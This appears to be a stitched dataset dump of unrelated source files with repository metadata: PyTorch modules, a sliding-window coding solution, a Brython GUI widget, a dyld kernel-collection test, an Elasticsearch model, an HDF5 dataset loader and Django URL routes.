                learningRate * self.dWeights.grad.data
            self.dWeights.grad.data.zero_()
            self.qWeights.data = self.qWeights.data - \
                learningRate * self.qWeights.grad.data
            self.qWeights.grad.data.zero_()
| 3.578125 | 4 |
problems/slidingwindow/Solution1100.py | akalu/cs-problems-python | 0 | 16991 | """
Sliding window
Given a string S, return the number of substrings of length K with no
repeated characters.
Example 1:
Input: S = "havefunonleetcode", K = 5 Output: 6 Explanation: There are 6
substrings they are : 'havef','avefu','vefun','efuno','etcod','tcode'.
counter havefunonleetcode
IDEA:
1) for each letter in the string setup a counter and
2) update unique counter each time when counter[let] hits 0, 1 or 2 (magic numbers)
aaabac
|||
123
0) a:3 unique=0
1) a:2 b:1 unique=1
2) a:2 b:1 unique=1
3) a:2 b:1 c:1 unique=1+2=3
"""
class Solution1100:
    """Solution for "Find K-Length Substrings With No Repeated Characters".

    Implements the sliding-window approach described in the module
    docstring above (the original class body was an empty placeholder).
    """

    def numKLenSubstrNoRepeats(self, S: str, K: int) -> int:
        """Count length-``K`` substrings of ``S`` with all distinct chars.

        Sliding window: grow ``right``; shrink ``left`` while the newest
        character is duplicated. Every all-distinct window of size >= K
        ending at ``right`` contributes exactly one valid K-length
        substring (its length-K suffix). O(len(S)) time.
        """
        if K <= 0 or K > len(S):
            return 0
        counts = {}
        left = 0
        total = 0
        for right, ch in enumerate(S):
            counts[ch] = counts.get(ch, 0) + 1
            while counts[ch] > 1:
                counts[S[left]] -= 1
                left += 1
            if right - left + 1 >= K:
                total += 1
        return total
| 3.953125 | 4 |
the_file_propagator/__init__.py | joeflack4/the-file-propagator | 0 | 16992 | """The File Propagator"""
| 1.007813 | 1 |
src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py | WebArchivCZ/WA-KAT | 3 | 16993 | <gh_stars>1-10
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: brython (http://brython.info) (like python3)
#
# Imports =====================================================================
from os.path import join
from browser import window
from browser import document
# virtual filesystem / modules provided by REST API
from virtual_fs import settings
# Functions & classes =========================================================
class KeywordListHandler(object):
    """
    This class is used to control the GUI for the list of keywords.

    It allows the user to add a new keyword, remove a present keyword and
    get a list of defined keywords.
    """
    def __init__(self, el_id, whole_id=None):
        # `el_id` is the DOM id of the <ol> container; `whole_id` is the id
        # of the wrapper element that is shown/hidden as a whole.
        if whole_id is None:
            whole_id = "whole_" + el_id
        self.el = document[el_id]
        self.whole_el = document[whole_id]
        self.all_lists_el = document["whole_keyword_list"]
        self.keywords = []
        # HTML template for the per-keyword remove button; %d is filled with
        # the keyword's index so each button gets a unique DOM id.
        self._remover = """
            <span class='kw_remover'
                  title='Odstranit klíčové slovo.'
                  id='kw_remover_id_%d'>
                ✖
            </span>
        """
        self._render()

    def _render(self):
        """
        Render the HTML code for all the :attr:`keywords` stored in this class.

        This method is called after each change in :attr:`keywords`.
        """
        # hide the list in case that there is no `keyword` to be displayed
        if self.keywords:
            self.whole_el.style.display = "block"
            self.all_lists_el.style.display = "block"
        else:
            self.whole_el.style.display = "none"
            if "<li>" not in self.all_lists_el.html:
                self.all_lists_el.style.display = "none"

        # construct the HTML code for each keyword
        html_lines = (
            "<li class='kw_enum'>{0} {1}</li>\n".format(
                keyword,
                (self._remover % cnt)
            )
            for cnt, keyword in enumerate(self.keywords)
        )

        # put the keywords into the HTML code of the page
        self.el.innerHTML = "<ol>\n%s\n</ol>\n" % "\n".join(html_lines)

        # this function is used to bind the ✖ to a function for removing the
        # keyword (closure captures the keyword value, not the loop variable)
        def keyword_remover(keyword):
            def remover(ev):
                self.remove_keyword(keyword)
            return remover

        # go thru all the keywords and bind them to keyword_remover()
        for cnt, keyword in enumerate(self.keywords):
            uid = "kw_remover_id_%d" % cnt
            el = document[uid]
            el.bind("click", keyword_remover(keyword))

    def add_keyword(self, keyword):
        """
        Add `keyword` to :attr:`keywords`.

        Args:
            keyword (str): New keyword.
        """
        self.keywords.append(keyword)
        self._render()

    def remove_keyword(self, keyword):
        """
        Remove `keyword` from :attr:`keywords`.

        Args:
            keyword (str): Keyword which should be removed.
        """
        self.keywords.remove(keyword)
        self._render()

    def reset(self):
        """
        Reset the widget to the default state.
        """
        self.keywords = []
        self._render()
# Module-level handler singletons for the three keyword lists in the GUI.
UserKeywordHandler = KeywordListHandler("user_keyword_list")
AlephKeywordHandler = KeywordListHandler("aleph_keyword_list")
AanalysisKeywordHandler = KeywordListHandler("analysis_keyword_list")
class KeywordAdder(object):
    """
    This class is here to control the typeahead input bar with keyword
    suggestions.

    Keywords selected from suggestions are then mapped to
    :class:`KeywordListHandler`.
    """
    # <input> element the typeahead widget is attached to.
    intput_el = document["keyword_adder"]

    @classmethod
    def on_select_callback(cls, selected_item):
        """
        This method defines the action taken when the user selects a keyword
        from the suggestion engine.

        Args:
            selected_item (str): Keyword selected by the user.

        Returns:
            str: Value on which the <input> element will be set.
        """
        UserKeywordHandler.add_keyword(selected_item)
        # Clear the input so the next keyword can be typed.
        return ""

    @classmethod
    def set_kw_typeahead_input(cls):
        """
        Map the typeahead input to the remote dataset.
        """
        # get reference to parent element
        parent_id = cls.intput_el.parent.id
        if "typeahead" not in parent_id.lower():
            parent_id = cls.intput_el.parent.parent.id

        # Delegate widget construction to the JS helper defined on `window`.
        window.make_keyword_typeahead_tag(
            "#" + parent_id,
            join(settings.API_PATH, "kw_list.json"),
            cls.on_select_callback,
        )
# Wire the typeahead input to the remote keyword dataset at import time.
KeywordAdder.set_kw_typeahead_input()
| 3.03125 | 3 |
scripts/rnn/gru/__init__.py | bfeng/CryptoGRU | 1 | 16994 | from .grucell import MyGRUCell
from .gru import MyGRU | 1.078125 | 1 |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/kext-missing-weak-bind/test.py | 1079278593/TreasureChest | 0 | 16995 | <reponame>1079278593/TreasureChest
#!/usr/bin/python2.7
import os
import KernelCollection
# Check that weak binds can be missing, so long as we check for the magic symbol
def check(kernel_cache):
    """Build an arm64 kernel collection with two kexts and assert its
    layout, symbols and fixups when a weak bind is missing.

    Every fixup is expected to resolve to the ``_gOSKextUnresolved`` magic
    symbol (kc(0) + 0x20000); the individual dylibs carry no fixups of
    their own.
    """
    kernel_cache.buildKernelCollection("arm64", "/kext-missing-weak-bind/main.kc", "/kext-missing-weak-bind/main.kernel", "/kext-missing-weak-bind/extensions", ["com.apple.foo", "com.apple.bar"], [])
    kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-layout", "-arch", "arm64"])

    # Layout: __DATA_CONST segment location and the three expected dylibs.
    assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__DATA_CONST"
    assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x18000"

    assert len(kernel_cache.dictionary()["dylibs"]) == 3
    assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
    assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
    assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"

    # Symbols
    kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-symbols", "-arch", "arm64"])
    # kernel
    assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
    assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["name"] == "_gOSKextUnresolved"
    assert kernel_cache.dictionary()["dylibs"][0]["global-symbols"][2]["vmAddr"] == "0x20000"

    # Check the fixups
    kernel_cache.analyze("/kext-missing-weak-bind/main.kc", ["-fixups", "-arch", "arm64"])
    assert len(kernel_cache.dictionary()["fixups"]) == 4
    assert kernel_cache.dictionary()["fixups"]["0x18000"] == "kc(0) + 0x20000"
    assert kernel_cache.dictionary()["fixups"]["0x18008"] == "kc(0) + 0x20000"
    assert kernel_cache.dictionary()["fixups"]["0x18010"] == "kc(0) + 0x20000"
    assert kernel_cache.dictionary()["fixups"]["0x18018"] == "kc(0) + 0x20000"
    assert len(kernel_cache.dictionary()["dylibs"]) == 3
    assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
    assert kernel_cache.dictionary()["dylibs"][0]["fixups"] == "none"
    assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.bar"
    assert kernel_cache.dictionary()["dylibs"][1]["fixups"] == "none"
    assert kernel_cache.dictionary()["dylibs"][2]["name"] == "com.apple.foo"
    assert kernel_cache.dictionary()["dylibs"][2]["fixups"] == "none"
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie -Wl,-sectcreate,__LINKINFO,__symbolsets,SymbolSets.plist -Wl,-segprot,__LINKINFO,r--,r-- main.c -o main.kernel
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk iphoneos.internal cc -arch arm64 -Wl,-kext -mkernel -nostdlib -Wl,-add_split_seg_info bar.c -o extensions/bar.kext/bar -Wl,-fixup_chains
# [~]> rm -r extensions/*.kext/*.ld
| 2.234375 | 2 |
datahub/search/investment/models.py | alixedi/data-hub-api-cd-poc | 0 | 16996 | <reponame>alixedi/data-hub-api-cd-poc
from elasticsearch_dsl import Boolean, Date, Double, Integer, Keyword, Long, Object, Text
from datahub.search import dict_utils
from datahub.search import fields
from datahub.search.models import BaseESModel
# Elasticsearch document type name for this model.
DOC_TYPE = 'investment_project'


def _related_investment_project_field():
    """Field for a related investment project."""
    # Just enough nested data to identify and search a linked project.
    return Object(properties={
        'id': Keyword(),
        'name': fields.NormalizedKeyword(),
        'project_code': fields.NormalizedKeyword(),
    })
class InvestmentProject(BaseESModel):
    """Elasticsearch representation of InvestmentProject.

    Class attributes declare the ES field mapping; MAPPINGS declares how
    model attributes are converted into document values, and SEARCH_FIELDS
    lists the fields queried by search.
    """

    id = Keyword()
    actual_land_date = Date()
    actual_uk_regions = fields.id_name_field()
    address_1 = Text()
    address_2 = Text()
    address_town = fields.NormalizedKeyword()
    address_postcode = Text()
    approved_commitment_to_invest = Boolean()
    approved_fdi = Boolean()
    approved_good_value = Boolean()
    approved_high_value = Boolean()
    approved_landed = Boolean()
    approved_non_fdi = Boolean()
    # index=False: stored but not searchable.
    allow_blank_estimated_land_date = Boolean(index=False)
    allow_blank_possible_uk_regions = Boolean(index=False)
    anonymous_description = fields.EnglishText()
    archived = Boolean()
    archived_by = fields.contact_or_adviser_field()
    archived_on = Date()
    archived_reason = Text()
    associated_non_fdi_r_and_d_project = _related_investment_project_field()
    average_salary = fields.id_name_field()
    business_activities = fields.id_name_field()
    client_cannot_provide_foreign_investment = Boolean()
    client_cannot_provide_total_investment = Boolean()
    client_contacts = fields.contact_or_adviser_field()
    client_relationship_manager = fields.contact_or_adviser_field(include_dit_team=True)
    client_requirements = Text(index=False)
    comments = fields.EnglishText()
    country_investment_originates_from = fields.id_name_field()
    country_lost_to = Object(
        properties={
            'id': Keyword(index=False),
            'name': Text(index=False),
        },
    )
    created_on = Date()
    created_by = fields.contact_or_adviser_field(include_dit_team=True)
    date_abandoned = Date()
    date_lost = Date()
    delivery_partners = fields.id_name_field()
    description = fields.EnglishText()
    estimated_land_date = Date()
    export_revenue = Boolean()
    fdi_type = fields.id_name_field()
    fdi_value = fields.id_name_field()
    foreign_equity_investment = Double()
    government_assistance = Boolean()
    intermediate_company = fields.id_name_field()
    investor_company = fields.id_name_partial_field()
    investor_company_country = fields.id_name_field()
    investment_type = fields.id_name_field()
    investor_type = fields.id_name_field()
    level_of_involvement = fields.id_name_field()
    likelihood_to_land = fields.id_name_field()
    project_assurance_adviser = fields.contact_or_adviser_field(include_dit_team=True)
    project_manager = fields.contact_or_adviser_field(include_dit_team=True)
    # name and project_code carry sub-fields for keyword and trigram search.
    name = Text(
        fields={
            'keyword': fields.NormalizedKeyword(),
            'trigram': fields.TrigramText(),
        },
    )
    new_tech_to_uk = Boolean()
    non_fdi_r_and_d_budget = Boolean()
    number_new_jobs = Integer()
    number_safeguarded_jobs = Long()
    modified_on = Date()
    project_arrived_in_triage_on = Date()
    project_code = fields.NormalizedKeyword(
        fields={
            'trigram': fields.TrigramText(),
        },
    )
    proposal_deadline = Date()
    other_business_activity = Text(index=False)
    quotable_as_public_case_study = Boolean()
    r_and_d_budget = Boolean()
    reason_abandoned = Text(index=False)
    reason_delayed = Text(index=False)
    reason_lost = Text(index=False)
    referral_source_activity = fields.id_name_field()
    referral_source_activity_event = fields.NormalizedKeyword()
    referral_source_activity_marketing = fields.id_name_field()
    referral_source_activity_website = fields.id_name_field()
    referral_source_adviser = Object(
        properties={
            'id': Keyword(index=False),
            'first_name': Text(index=False),
            'last_name': Text(index=False),
            'name': Text(index=False),
        },
    )
    sector = fields.sector_field()
    site_decided = Boolean()
    some_new_jobs = Boolean()
    specific_programme = fields.id_name_field()
    stage = fields.id_name_field()
    status = fields.NormalizedKeyword()
    team_members = fields.contact_or_adviser_field(include_dit_team=True)
    total_investment = Double()
    uk_company = fields.id_name_partial_field()
    uk_company_decided = Boolean()
    uk_region_locations = fields.id_name_field()
    will_new_jobs_last_two_years = Boolean()
    level_of_involvement_simplified = Keyword()
    gross_value_added = Double()

    # How model attributes are converted to document values (callables take
    # the attribute value; collections are expanded via .all()).
    MAPPINGS = {
        'actual_uk_regions': lambda col: [
            dict_utils.id_name_dict(c) for c in col.all()
        ],
        'archived_by': dict_utils.contact_or_adviser_dict,
        'associated_non_fdi_r_and_d_project': dict_utils.investment_project_dict,
        'average_salary': dict_utils.id_name_dict,
        'business_activities': lambda col: [dict_utils.id_name_dict(c) for c in col.all()],
        'client_contacts': lambda col: [dict_utils.contact_or_adviser_dict(c) for c in col.all()],
        'client_relationship_manager': dict_utils.adviser_dict_with_team,
        'country_lost_to': dict_utils.id_name_dict,
        'country_investment_originates_from': dict_utils.id_name_dict,
        'created_by': dict_utils.adviser_dict_with_team,
        'delivery_partners': lambda col: [
            dict_utils.id_name_dict(c) for c in col.all()
        ],
        'fdi_type': dict_utils.id_name_dict,
        'fdi_value': dict_utils.id_name_dict,
        'intermediate_company': dict_utils.id_name_dict,
        'investment_type': dict_utils.id_name_dict,
        'investor_company': dict_utils.id_name_dict,
        'investor_company_country': dict_utils.id_name_dict,
        'investor_type': dict_utils.id_name_dict,
        'level_of_involvement': dict_utils.id_name_dict,
        'likelihood_to_land': dict_utils.id_name_dict,
        'project_assurance_adviser': dict_utils.adviser_dict_with_team,
        'project_code': str,
        'project_manager': dict_utils.adviser_dict_with_team,
        'referral_source_activity': dict_utils.id_name_dict,
        'referral_source_activity_marketing': dict_utils.id_name_dict,
        'referral_source_activity_website': dict_utils.id_name_dict,
        'referral_source_adviser': dict_utils.contact_or_adviser_dict,
        'sector': dict_utils.sector_dict,
        'specific_programme': dict_utils.id_name_dict,
        'stage': dict_utils.id_name_dict,
        'team_members': lambda col: [
            dict_utils.contact_or_adviser_dict(c.adviser, include_dit_team=True) for c in col.all()
        ],
        'uk_company': dict_utils.id_name_dict,
        'uk_region_locations': lambda col: [
            dict_utils.id_name_dict(c) for c in col.all()
        ],
    }

    # Fields targeted by the search query.
    SEARCH_FIELDS = (
        'id',
        'name',
        'name.trigram',
        'uk_company.name',
        'uk_company.name.trigram',
        'investor_company.name',
        'investor_company.name.trigram',
        'project_code.trigram',
    )

    class Meta:
        """Default document meta data."""

        doc_type = DOC_TYPE

    class Index:
        doc_type = DOC_TYPE
| 2.34375 | 2 |
robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py | Dreem-Organization/RobustSleepNet | 16 | 16997 | <reponame>Dreem-Organization/RobustSleepNet
from collections import OrderedDict
import torch
from torch import nn
class FullyConnected(nn.Module):
    """Concatenate per-feature tensors and pass them through an optional MLP.

    Each configured layer is Linear + ReLU, with dropout applied before
    every layer. With ``layers=None`` the module is a pass-through over the
    concatenated features.

    Args:
        features: mapping of feature name -> {"shape": (channels, ...)};
            the first shape entry of every feature is summed to obtain the
            input width of the first layer.
        layers: list of hidden sizes, or None for a pass-through.
        dropout: dropout probability applied before each layer.
    """

    def __init__(self, features, layers=None, dropout=0.0):
        super(FullyConnected, self).__init__()
        # NOTE: the original constructor printed the layer config to stdout;
        # that debug output has been removed.
        input_channels = sum(features[name]["shape"][0] for name in features)
        self.dropout = nn.Dropout(dropout)
        if isinstance(layers, list):
            blocks = []
            for i, n_dim in enumerate(layers):
                in_features = input_channels if i == 0 else layers[i - 1]
                blocks.append(
                    nn.Sequential(
                        OrderedDict(
                            [
                                (
                                    "linear_{}".format(i),
                                    nn.Linear(in_features=in_features, out_features=n_dim),
                                ),
                                ("relu_{}".format(i), nn.ReLU()),
                            ]
                        )
                    )
                )
            self.layers = nn.ModuleList(blocks)
            self.out_features = layers[-1]
        elif layers is None:
            # Wrap Identity in a ModuleList (the original used a bare Python
            # list, bypassing nn.Module registration) so both branches are
            # consistent.
            self.layers = nn.ModuleList([nn.Identity()])
            self.out_features = input_channels
        else:
            # The original silently left self.layers/out_features unset here,
            # failing later with AttributeError; fail fast instead.
            raise ValueError(
                "layers must be a list of ints or None, got {!r}".format(layers)
            )

    def forward(self, x):
        """Concatenate the feature tensors (dict order) along the last dim
        and apply dropout + each layer in turn."""
        features = torch.cat([x[name] for name in x], -1)
        for layer in self.layers:
            features = self.dropout(features)
            features = layer(features)
        return features
| 2.546875 | 3 |
data/rawdata_dataset.py | weiyw16/pytorch-CycleGAN-and-pix2pix | 0 | 16998 | #import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
    """Paired A/B dataset backed by two HDF5 files.

    ``initialize`` opens <dataroot>/<phase>/A.h5 and B.h5; entries are
    stored under 1-based keys "A1", "A2", ... and "B1", "B2", ....

    NOTE(review): the original __getitem__ computed input_nc/output_nc from
    opt.which_direction but never used them, and carried large blocks of
    commented-out pix2pix-style cropping code; both have been removed with
    no behavioural change.
    """

    def __init__(self):
        super(rawdataDataset, self).__init__()

    def name(self):
        """Return the dataset's display name."""
        return 'rawdataDataset'

    @staticmethod
    def modify_commandline_options(parser, is_train):
        """Hook for dataset-specific CLI options (none needed here)."""
        return parser

    def initialize(self, opt):
        """Open the A/B HDF5 files for the requested phase (train/test).

        Args:
            opt: options object with at least ``dataroot`` and ``phase``.
        """
        self.opt = opt
        self.root = opt.dataroot
        self.dir_AB = os.path.join(opt.dataroot, opt.phase)  # phase: train test
        self.A_paths = self.dir_AB + "/A.h5"
        self.B_paths = self.dir_AB + "/B.h5"
        self.frameA = h5py.File(self.A_paths, 'r')
        self.frameB = h5py.File(self.B_paths, 'r')

    def __len__(self):
        # Number of datasets stored in A.h5 (assumed equal to B.h5 —
        # TODO confirm the files are always written in matched pairs).
        return len(self.frameA)

    def __getitem__(self, index):
        # Keys are 1-based: "A1"/"B1" correspond to index 0.
        A = self.frameA["A" + str(index + 1)]
        B = self.frameB["B" + str(index + 1)]
        return {'A': A, 'B': B, 'A_paths': self.A_paths, 'B_paths': self.B_paths}
#%hist -f rawdata_dataset.py
| 2.21875 | 2 |
pythons/pythons/pythons_app/urls.py | BoyanPeychinov/python_web_framework | 0 | 16999 | from django.urls import path
from . import views
from .views import IndexView
# URL routes for pythons_app; class-based views replace the older function
# views, which are kept below as commented-out references.
urlpatterns = [
    # path('', views.index, name="index"),
    path('', IndexView.as_view(), name="index"),
    # path('create/', views.create, name="create"),
    path('create/', views.PythonCreateView.as_view(), name="create"),
]